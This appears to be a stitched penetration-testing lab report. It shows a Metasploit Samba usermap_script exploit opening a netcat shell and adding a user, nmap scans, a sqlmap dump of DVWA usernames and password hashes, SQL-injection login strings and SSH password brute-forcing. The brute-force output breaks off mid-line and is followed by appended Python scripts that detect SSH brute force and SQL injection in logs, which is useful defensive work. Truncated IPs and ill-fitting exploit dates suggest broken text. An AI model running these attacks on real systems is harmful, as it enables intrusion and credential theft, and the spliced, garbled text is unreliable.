
Penetration testing training, 13 March

Day 1: summary of the main experiments

First, a Struts2 vulnerability was used to execute arbitrary commands directly and take control of the host.

Lab environment: Kali Linux as the attack machine; OWASP, 2003 and Metasploitable as target machines, with network connectivity between them confirmed.

Using Metasploit to attack the Samba service on the target and obtain a shell:

    search samba                        find the module
    use multi/samba/usermap_script      select the exploit module
    show payloads                       list the payloads compatible with this module
    set payload cmd/unix/bind_netcat    use netcat to run a shell once the exploit succeeds
    show options                        list the parameters that need to be set
    set rhost 54                        set the target host
    exploit                             launch the attack

Steps in detail

1. Install the VMware virtualisation software, start Kali, OWASP, Metasploitable and the other tools, and build the environment so that the machines can reach each other. The network is configured in NAT mode with the address range /24.

2. Start the Kali VM, switch to root, enter msfconsole and first change the initial password to 123456:

    msf > passwd
    [*] exec: passwd
    Enter new UNIX password:
    Retype new UNIX password:
    passwd: password updated successfully

Then search for the Samba modules:

    msf > search samba

    Matching Modules
    ================

    Name                                             Disclosure Date  Rank       Description
    ----                                             ---------------  ----       -----------
    auxiliary/admin/smb/samba_symlink_traversal                       normal     Samba Symlink Directory Traversal
    auxiliary/dos/samba/lsa_addprivs_heap                             normal     Samba lsa_io_privilege_set Heap Overflow
    auxiliary/dos/samba/lsa_transnames_heap                           normal     Samba lsa_io_trans_names Heap Overflow
    auxiliary/dos/samba/read_nttrans_ea_list                          normal     Samba read_nttrans_ea_list Integer Overflow
    exploit/freebsd/samba/trans2open                 2003-04-07       great      Samba trans2open Overflow (*BSD x86)
    exploit/linux/samba/chain_reply                  2021-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
    exploit/linux/samba/lsa_transnames_heap          2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
    exploit/linux/samba/setinfopolicy_heap           2021-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
    exploit/linux/samba/trans2open                   2003-04-07       great      Samba trans2open Overflow (Linux x86)
    exploit/multi/samba/nttrans                      2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
    exploit/multi/samba/usermap_script               2007-05-14       excellent  Samba "username map script" Command Execution
    exploit/osx/samba/lsa_transnames_heap            2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
    exploit/osx/samba/trans2open                     2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
    exploit/solaris/samba/lsa_transnames_heap        2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
    exploit/solaris/samba/trans2open                 2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
    exploit/unix/misc/distcc_exec                    2002-02-01       excellent  DistCC Daemon Command Execution
    exploit/unix/webapp/citrix_access_gateway_exec   2021-12-21       excellent  Citrix Access Gateway Command Execution
    exploit/windows/http/sambar6_search_results      2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
    exploit/windows/license/calicclnt_getconfig      2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
    post/linux/gather/enum_configs                                    normal     Linux Gather Configurations

Select the exploit module and list the payloads compatible with it:

    msf > use multi/samba/usermap_script
    msf exploit(usermap_script) > show payloads

    Compatible Payloads
    ===================

    Name                                Disclosure Date  Rank    Description
    ----                                ---------------  ----    -----------
    cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
    cmd/unix/bind_inetd                                  normal  Unix Command Shell, Bind TCP (inetd)
    cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
    cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
    cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
    cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
    cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
    cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
    cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
    cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
    cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
    cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
    cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
    cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
    cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
    cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
    cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
    cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
    cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
    cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
    cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
    cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
    cmd/unix/reverse_python_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via python)
    cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
    cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
    cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
    cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)

Choose netcat as the payload that runs a shell once the exploit succeeds, set the target, and launch:

    msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
    payload => cmd/unix/bind_netcat
    msf exploit(usermap_script) > show options          list the parameters that need to be set
    msf exploit(usermap_script) > set rhost 54          set the target host
    rhost => 54
    msf exploit(usermap_script) > exploit               launch the attack
    [*] Started bind handler
    [*] Command shell session 1 opened (28:56558 -> 10.10.10.254:4444) at 2021-03-13 16:06:40 +0800

Control of host 54 has been obtained, so a user can be added:

    useradd test
    The user was added successfully.

Host discovery

    -PU -sn                                            UDP ping; services are not listed
    -Pn                                                do not ping
    nmap -sS -Pn xx.xx.xx.xx                           TCP SYN scan, sends no ICMP
    nmap -sV -Pn xx.xx.xx.xx                           list detailed service information
    nmap -P0 --script=smb-check-vulns xx.xx.xx.xx      check for the MS08-067 vulnerability

Scanning the site with nmap from inside msfconsole:

    msf > nmap -sV -Pn 54
    [*] exec: nmap -sV -Pn 54

    Starting Nmap 6.46 at 2021-03-13 16:38 CST
    Nmap scan report for 54
    Host is up (0.00020s latency).
    All 1000 scanned ports on 54 are filtered
    MAC Address: 00:50:56:E7:1B:31 (VMware)

    Service detection performed.
    Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

    msf > nmap -P0 --script=smb-check-vulns 54
    [*] exec: nmap -P0 --script=smb-check-vulns 54

    Starting Nmap 6.46 at 2021-03-13 16:47 CST
    Nmap scan report for 54
    Host is up (0.00021s latency).
    All 1000 scanned ports on 54 are filtered
    MAC Address: 00:50:56:E7:1B:31 (VMware)

    Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds

    msf > nmap -O
    [*] exec: nmap -O

    Starting Nmap 6.46 at 2021-03-13 17:16 CST
    Nmap scan report for 32
    Host is up (0.0054s latency).
    Not shown: 999 filtered ports
    PORT   STATE SERVICE
    80/tcp open  http
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)
    No exact OS matches for host (test conditions non-ideal).

    OS detection performed.
    Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds

Directory scanning:

    msf > use auxiliary/scanner/http/dir_scanner
    msf auxiliary(dir_scanner) > set threads 50
    threads => 50
    msf auxiliary(dir_scanner) > set rhosts
    rhosts =>
    msf auxiliary(dir_scanner) > run
    [*] Detecting error code
    [*] Detecting error code
    [*] Scanned 2 of 2 hosts (100% complete)
    [*] Auxiliary module execution completed

Checking for SQL injection with sqlmap

    root@kali:~# sqlmap
    root@kali:~# sqlmap -u --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23"

Passing the session cookie this way lets sqlmap retrieve the users and passwords from the site's database.

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 11:50:20

    [11:50:20] [INFO] testing connection to the target URL
    [11:50:20] [INFO] testing if the target URL is stable. This can take a couple of seconds
    [11:50:21] [INFO] target URL is stable
    [11:50:21] [INFO] testing if GET parameter 'id' is dynamic
    [11:50:21] [INFO] confirming that GET parameter 'id' is dynamic
    [11:50:21] [INFO] GET parameter 'id' is dynamic
    [11:50:21] [INFO] heuristics detected web page charset 'ascii'
    [11:50:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    [11:50:21] [INFO] testing for SQL injection on GET parameter 'id'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
    do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
    [11:50:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [11:50:25] [WARNING] reflective value(s) found and filtering out
    [11:50:25] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [11:50:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [11:50:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
    [11:50:25] [INFO] testing 'MySQL inline queries'
    [11:50:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [11:50:25] [WARNING] time-based comparison requires larger statistical model, please wait...
    [11:50:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [11:50:36] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
    [11:50:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [11:50:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [11:50:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [11:50:36] [INFO] target URL appears to have 2 columns in query
    [11:50:36] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
    sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 4334=4334 AND 'IASx'='IASx&Submit=Submit

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1' AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END)),0x7163716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zahu'='zahu&Submit=Submit

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626e6f71,0x4b4977451,0x7163716271)#&Submit=Submit

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'XFNP'='XFNP&Submit=Submit
    ---
    [11:50:40] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [11:50:40] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/29'

    [*] shutting down at 11:50:40

Listing the databases:

    root@kali:~# sqlmap -u --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id --dbs

The databases returned are:

    [11:53:32] [WARNING] reflective value(s) found and filtering out
    available databases [2]:
    [*] dvwa
    [*] information_schema

Looking inside the dvwa database:

    root@kali:~# sqlmap -u --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa --tables

    Database: dvwa
    [2 tables]
    +-----------+
    | guestbook |
    | users     |
    +-----------+

    root@kali:~# sqlmap -u --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users --columns

    Database: dvwa
    Table: users
    [6 columns]
    +------------+-------------+
    | Column     | Type        |
    +------------+-------------+
    | user       | varchar(15) |
    | avatar     | varchar(70) |
    | first_name | varchar(15) |
    | last_name  | varchar(15) |
    | password   | varchar(32) |
    | user_id    | int(6)      |
    +------------+-------------+

    root@kali:~# sqlmap -u --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users -C user,password --dump

    Database: dvwa
    Table: users
    [5 entries]
    +---------+--------------------------------------------+
    | user    | password                                   |
    +---------+--------------------------------------------+
    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
    | admin   | 21232f297a57a5a743894a0e4a801fc3 (admin)   |
    | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)  |
    | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7           |
    | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99           |
    +---------+--------------------------------------------+

This shows that the user name is admin and the password is admin. Success.

Day 2

Information gathering

    whois          domain registration lookup
    netcraft       information provided by the Netcraft site: the site's hosting provider, site ranking, operating system and so on
    same-server    if the main site has no weaknesses, look at the other sites hosted on the same server
    ip2domain      reverse lookup of the sites behind an IP address

1. Google hacking.

2. Directory structure: "parent directory" site:/xxxx. Directories named inc hold site configuration, database credentials and similar; bak holds backup files; txt or sql files hold data structures and similar.

    use auxiliary/scanner/http/dir_scanner
    set threads 50      set the number of threads
    set rhosts xxxx     set the target
    run                 once the options are set (exploit also works)

   robots.txt tells search engines which directories hold sensitive files.

3. Searching for files of a particular type: site:xxxx.

4. Finding pages likely to contain SQL injection points: site:xxx inurl:login. On the login page, append a single quote to an arbitrary user name to trigger a database error; the error reveals the format of the query the database runs:

    select * from users where username='xx' and password='xx'

   Inputs tried:

    admin' or '1
    admin' or 1
    select * from users where username='admin' ...
    admin' or 1=1 --        with this, any digits typed into the password field are accepted

   Add a single quote to a page on the site: if an injection point exists the database reports an error, otherwise the page does not change. Another way is to append and 1=1 or and 1=2; both produce errors. a'='a works as well, and admin' or 1=1 -- logs in.

   Then hand the URL to sqlmap:

    sqlmap -u
    sqlmap -u http://
    root@kali:~# sqlmap -u url --cookie= -p id -D -T

Host discovery and port scanning

1. Live host scan:

    use auxiliary/scanner/discovery/arp_sweep
    set rhosts 2-130
    set threads 50
    run

2. nmap.

Service scanning and enumeration

1. The scanner auxiliary modules in Metasploit include many tools for service scanning and enumeration; they are usually named [service name]_login. Search for them with: search name:version

2. SSH enumeration:

    use auxiliary/scanner/ssh/ssh_version
    set rhosts xxxx
    set threads 100
    run

SSH enumeration experiment:

    root@kali:~# msfconsole
    msf > use auxiliary/scanner/ssh/ssh_version
    msf auxiliary(ssh_version) > show options

    Module options (auxiliary/scanner/ssh/ssh_version):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target address range or CIDR identifier
       RPORT    22               yes       The target port
       THREADS  1                yes       The number of concurrent threads
       TIMEOUT  30               yes       Timeout for the SSH probe

    msf auxiliary(ssh_version) > set rhosts 29
    rhosts => 29
    msf auxiliary(ssh_version) > set threads 100
    threads => 100
    msf auxiliary(ssh_version) > run
    [*] 29:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Password guessing

The address can be an address range, a single IP or an address block. In msfconsole:

    use auxiliary/scanner/ssh/ssh_login
    set rhosts 0
    set username root
    set pass_file
    set threads 100
    run

Create the password file with vi beforehand.

Password sniffing: use auxiliary/sniffer/psnuffle

Password guessing experiment:

    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > show options

    Module options (auxiliary/scanner/ssh/ssh_login):

       Name              Current Setting  Required  Description
       ----              ---------------  --------  -----------
       BLANK_PASSWORDS   false            no        Try blank passwords for all users
       BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
       DB_ALL_PASS       false            no        Add all passwords in the current database to the list
       DB_ALL_USERS      false            no        Add all users in the current database to the list
       PASSWORD                           no        A specific password to authenticate with
       PASS_FILE                          no        File containing passwords, one per line
       RHOSTS                             yes       The target address range or CIDR identifier
       RPORT             22               yes       The target port
       STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
       THREADS           1                yes       The number of concurrent threads
       USERNAME                           no        A specific username to authenticate as
       USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS      false            no        Try the username as the password for all users
       USER_FILE                          no        File containing usernames, one per line
       VERBOSE           true             yes       Whether to print output for all attempts

    msf auxiliary(ssh_login) > set username root
    username => root
    msf auxiliary(ssh_login) > set pass_file /root/passwd        a password file named passwd created in root's home directory
    pass_file => /root/passwd
    msf auxiliary(ssh_login) > set threads 50
    threads => 50
    msf auxiliary(ssh_login) > set rhosts 29
    rhosts => 29
    msf auxiliary(ssh_login) > run
    [*] 29:22 SSH - Starting bruteforce
    [*] 29:22 SSH - [1/3] - Trying: username: 'root' with password: 'ahbieid' - 10.10.1
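The ssh_login run above is what the defender's side of the same experiment looks like in sshd's log: a burst of "Failed password for root" lines from one source, optionally followed by an "Accepted password" once a word-list entry matches. The following script is an added example, not part of the original report or of Metasploit; it parses constructed auth.log-style lines (the source addresses, host name, ports and timestamps are made up) and flags any source whose failures inside a sliding window reach a threshold, noting whether that source later logged in successfully.

```python
"""Detect SSH password-guessing bursts in auth.log-style records.

Added example, not part of the original lab report. The log lines below are
constructed to resemble what sshd on the target would record while the
ssh_login module tries passwords for 'root' from a word list; the source
addresses, host name, ports and timestamps are made up.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# One sshd authentication result per line, e.g.
# "Mar 13 16:58:01 target sshd[2101]: Failed password for root from 10.10.10.250 port 40001 ssh2"
AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+)"
    r" from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

# Constructed sample: an admin mistyping a password twice, then a scripted run of
# twelve guesses in twelve seconds against root followed by a successful login.
CONSTRUCTED_AUTH_LOG = [
    "Mar 13 16:50:00 target sshd[2001]: Failed password for alice from 10.10.10.7 port 51000 ssh2",
    "Mar 13 16:50:05 target sshd[2002]: Failed password for invalid user alcie from 10.10.10.7 port 51001 ssh2",
    "Mar 13 16:50:09 target sshd[2003]: Accepted password for alice from 10.10.10.7 port 51002 ssh2",
] + [
    f"Mar 13 16:58:{s:02d} target sshd[{2100 + s}]: Failed password for root "
    f"from 10.10.10.250 port {40000 + s} ssh2"
    for s in range(1, 13)
] + [
    "Mar 13 16:58:13 target sshd[2113]: Accepted password for root from 10.10.10.250 port 40013 ssh2",
    "Mar 13 16:58:13 target sshd[2113]: pam_unix(sshd:session): session opened for user root by (uid=0)",
]


def parse_events(lines, year=2021):
    """Return (timestamp, source, user, result) tuples sorted by time.
    syslog timestamps carry no year, so the caller supplies it."""
    events = []
    for line in lines:
        m = AUTH_RE.match(line)
        if m is None:
            continue  # session/pam lines and anything else are not auth results
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], m["user"], m["result"]))
    events.sort(key=lambda e: e[0])
    return events


def find_bursts(events, threshold=10, window=timedelta(seconds=60)):
    """Flag sources whose failed logins inside any sliding `window` reach
    `threshold`. The summary also records which user, if any, that source
    later logged in as: a burst followed by success is a likely compromise."""
    recent = defaultdict(deque)   # src -> failure timestamps still inside the window
    tried = defaultdict(set)      # src -> user names attempted
    alerts = {}
    for ts, src, user, result in events:
        if result == "Accepted":
            if src in alerts:
                alerts[src]["success_after"] = user
            continue
        tried[src].add(user)
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            entry = alerts.setdefault(
                src, {"peak": 0, "first": q[0], "last": ts, "users": tried[src], "success_after": None}
            )
            entry["peak"] = max(entry["peak"], len(q))
            entry["last"] = ts
    return alerts


if __name__ == "__main__":
    for src, a in find_bursts(parse_events(CONSTRUCTED_AUTH_LOG)).items():
        print(f"{src}: {a['peak']} failures within the window between {a['first']:%H:%M:%S} and "
              f"{a['last']:%H:%M:%S}, users tried {sorted(a['users'])}, "
              f"successful login afterwards: {a['success_after']}")
```

With the defaults (10 failures in 60 seconds) only the scripted source is flagged; the admin's two typos stay below the threshold. The threshold and window are the knobs to tune against real traffic, and THREADS 50 in the module above means the failures arrive far faster than a human could type them.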

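The sqlmap run and the manual quote / "or 1=1" tests earlier in this report leave an equally recognisable trace in the web server's access log. The script below is an added example, not code from the original report, sqlmap or DVWA: it parses constructed combined-format log lines whose query strings carry the same kinds of payload (boolean, error-based, UNION and time-based from sqlmap; a lone quote and tautologies from the manual tests), classifies each request by technique, and gives a per-source verdict. Source addresses, timestamps, sizes and User-Agent strings are made up; the "sqlmap/..." User-Agent is sqlmap's default banner, which an operator can change, so it is treated as a bonus indicator and not relied on. DVWA's real login is a POST; the example keeps its parameters in the query string so that they appear in the log line.

```python
"""Flag SQL-injection probing in web server access logs.

Added example, not code from the original report. The combined-format log
lines are constructed; addresses, timestamps, sizes and User-Agents are made up.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx combined log format:
# src ident user [time] "METHOD target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures run against each decoded, lowercased, whitespace-normalised parameter value.
# 'stray-quote' on its own is weak evidence (a name like O'Brien has one); the others are strong.
SIGNATURES = [
    ("tautology",        re.compile(r"\bor\s+'?\d+'?\s*=\s*'?\d+|\bor\s+'[^']*'\s*=\s*'")),
    ("boolean-blind",    re.compile(r"\band\s+\d+\s*=\s*\d+")),
    ("error-based",      re.compile(r"information_schema|floor\(\s*rand\(")),
    ("union-select",     re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("time-based",       re.compile(r"\bsleep\s*\(|\bbenchmark\s*\(")),
    ("comment-truncate", re.compile(r"(?:--|#)$")),
    ("stray-quote",      re.compile(r"'")),
]
STRONG = {label for label, _ in SIGNATURES} - {"stray-quote"}

UA_BROWSER = "Mozilla/5.0 (X11; Linux x86_64) Firefox/28.0"
UA_SQLMAP = "sqlmap/1.0-dev (http://sqlmap.org)"   # constructed; sqlmap's default banner


def _line(src, target, ua, ts="13/Mar/2021:11:50:20 +0800", status=200):
    """Build one constructed combined-format log line."""
    return f'{src} - - [{ts}] "GET {target} HTTP/1.1" {status} 4512 "-" "{ua}"'


SQLI = "/dvwa/vulnerabilities/sqli/?id="
CONSTRUCTED_ACCESS_LOG = [
    # ordinary browsing, including a legitimate apostrophe
    _line("10.10.10.9", SQLI + "2&Submit=Submit", UA_BROWSER),
    _line("10.10.10.9", "/search?q=O%27Brien", UA_BROWSER),
    # manual probing: a lone quote, a tautology with a comment, then the login form
    _line("10.10.10.7", SQLI + "1%27&Submit=Submit", UA_BROWSER, status=500),
    _line("10.10.10.7", SQLI + "1%27%20or%201%3D1%20--%20&Submit=Submit", UA_BROWSER),
    _line("10.10.10.7", "/dvwa/login.php?username=admin%27%20or%20%27a%27%3D%27a&password=1", UA_BROWSER),
    # sqlmap's boolean, error-based, UNION and time-based payloads, URL-encoded as sent
    _line("10.10.10.250", SQLI + "1%27%20AND%204334%3D4334%20AND%20%27IASx%27%3D%27IASx&Submit=Submit", UA_SQLMAP),
    _line("10.10.10.250", SQLI + "1%27%20AND%20%28SELECT%204941%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71626e6f71"
          "%2C%28SELECT%20%28CASE%20WHEN%20%284941%3D4941%29%20THEN%201%20ELSE%200%20END%29%29%2C0x7163716271"
          "%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29"
          "%20AND%20%27zahu%27%3D%27zahu&Submit=Submit", UA_SQLMAP),
    _line("10.10.10.250", SQLI + "1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x71626e6f71%2C0x4b4977451"
          "%2C0x7163716271%29%23&Submit=Submit", UA_SQLMAP),
    _line("10.10.10.250", SQLI + "1%27%20AND%20SLEEP%285%29%20AND%20%27XFNP%27%3D%27XFNP&Submit=Submit", UA_SQLMAP),
]


def parse_access_log(lines):
    """Yield (src, user_agent, path, [(name, value), ...]) with values URL-decoded by parse_qsl."""
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        parts = urlsplit(m["target"])
        yield m["src"], m["ua"], parts.path, parse_qsl(parts.query, keep_blank_values=True)


def classify_params(params):
    """Return the set of technique labels matched by any parameter value."""
    found = set()
    for _, value in params:
        norm = " ".join(value.lower().split())   # fold case and whitespace before matching
        for label, rx in SIGNATURES:
            if rx.search(norm):
                found.add(label)
    return found


def verdict(summary):
    strong = summary["techniques"] & STRONG
    if summary["tool_ua"] or len(strong) >= 3:
        return "scanner"   # several distinct techniques in a row is automation, not a typo
    if strong or summary["quotes"] >= 2:
        return "probe"
    return "clean"


def summarize(lines):
    """Per-source view: request count, techniques seen, quote-only hits, tool banner, verdict."""
    per_src = defaultdict(lambda: {"requests": 0, "techniques": set(), "quotes": 0, "tool_ua": False})
    for src, ua, _path, params in parse_access_log(lines):
        s = per_src[src]
        s["requests"] += 1
        found = classify_params(params)
        s["techniques"] |= found
        s["quotes"] += "stray-quote" in found
        s["tool_ua"] = s["tool_ua"] or ua.lower().startswith("sqlmap/")
    for s in per_src.values():
        s["verdict"] = verdict(s)
    return dict(per_src)


if __name__ == "__main__":
    for src, s in summarize(CONSTRUCTED_ACCESS_LOG).items():
        print(f"{src}: {s['verdict']:7} requests={s['requests']} techniques={sorted(s['techniques'])}")
```

The per-source aggregation is the point: a single quote in one request is noise, but four distinct injection techniques from one address inside the same minute is the fingerprint of the sqlmap session shown in the report, whatever the User-Agent says.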